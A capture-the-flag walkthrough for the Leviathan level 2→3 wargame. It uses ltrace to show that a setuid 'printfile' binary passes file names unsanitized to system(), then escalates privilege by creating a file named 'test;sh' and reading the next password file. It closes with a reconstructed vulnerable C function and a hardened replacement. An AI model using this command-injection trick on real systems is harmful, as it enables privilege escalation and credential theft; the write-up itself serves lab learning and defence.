Leviathan Level 2 → Level 3

The printfile binary prints a file's contents to the screen. However, trying to show the leviathan3 password results in a permission error.

./printfile /etc/leviathan_pass/leviathan3
You cant have that file...

Let's run ltrace again on the password file and see what happens.

ltrace ./printfile /etc/leviathan_pass/leviathan3
__libc_start_main(0x80484f4, 2, -10332, 0x80485d0, 0x8048640 <unfinished ...>
access("/etc/leviathan_pass/leviathan3", 4) = -1
puts("You cant have that file..."You cant have that file...
) = 27
+++ exited (status 1) +++

Let's see what happens if we use printfile correctly.

ltrace ./printfile /tmp/l2/test
__libc_start_main(0x80484f4, 2, -10316, 0x80485d0, 0x8048640 <unfinished ...>
access("/tmp/l2/test", 4) = 0
snprintf("/bin/cat /tmp/l2/test", 511, "/bin/cat %s", "/tmp/l2/test") = 21
system("/bin/cat /tmp/l2/test"
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
+++ exited (status 0) +++

Notice that it checks the access level with access() and then prints the file by running /bin/cat on the filename through system(). The problem is that there is no input sanitizing, so we can supply a filename that runs additional commands. The first thing that comes to mind is to append a command that reads the password file, but "/" is not allowed in a file name. So we can use ";" to add a second command that spawns a shell.

touch "/tmp/l2/test;sh"
./printfile "/tmp/l2/test;sh"

Once the shell is spawned with elevated permissions, we simply read the content of the password file for the next level.

cat /etc/leviathan_pass/leviathan3
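
The flaw from a defender's side, as an added example that is not part of the original write-up and is not the real printfile source: print_file_vulnerable is reconstructed from the ltrace calls shown above, and print_file_safe is a hypothetical hardened replacement that never hands the file name to a shell. The function names and the privilege-dropping design are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern, reconstructed from the ltrace output above:
 * the file name is pasted into a shell command line, so ';' in the
 * name ends the cat command and starts a second one. */
int print_file_vulnerable(const char *path) {
    char cmd[512];
    if (access(path, R_OK) != 0) {          /* checks the real UID only */
        puts("You cant have that file...");
        return 1;
    }
    snprintf(cmd, 511, "/bin/cat %s", path);
    return system(cmd);                      /* runs via /bin/sh -c */
}

/* Hardened form (assumed design): no shell, no gap between check and use.
 * Drop the effective UID, then let open() do the permission check on
 * the literal path. Returns 0 on success, -1 on any failure. */
int print_file_safe(const char *path, int out_fd) {
    char buf[4096];
    struct stat st;
    ssize_t n;
    if (seteuid(getuid()) != 0)              /* give up setuid privilege */
        return -1;
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);                           /* refuse dirs, devices, FIFOs */
        return -1;
    }
    while ((n = read(fd, buf, sizeof buf)) > 0) {
        if (write(out_fd, buf, (size_t)n) != n) {
            close(fd);
            return -1;
        }
    }
    close(fd);
    return n == 0 ? 0 : -1;
}

int main(int argc, char **argv) {
    if (argc != 2) return 2;
    return print_file_safe(argv[1], STDOUT_FILENO) == 0 ? 0 : 1;
}
```

With the hardened function, a name such as "test;sh" is just an odd file name: it is opened literally, and the kernel enforces the caller's own read permission at open() time.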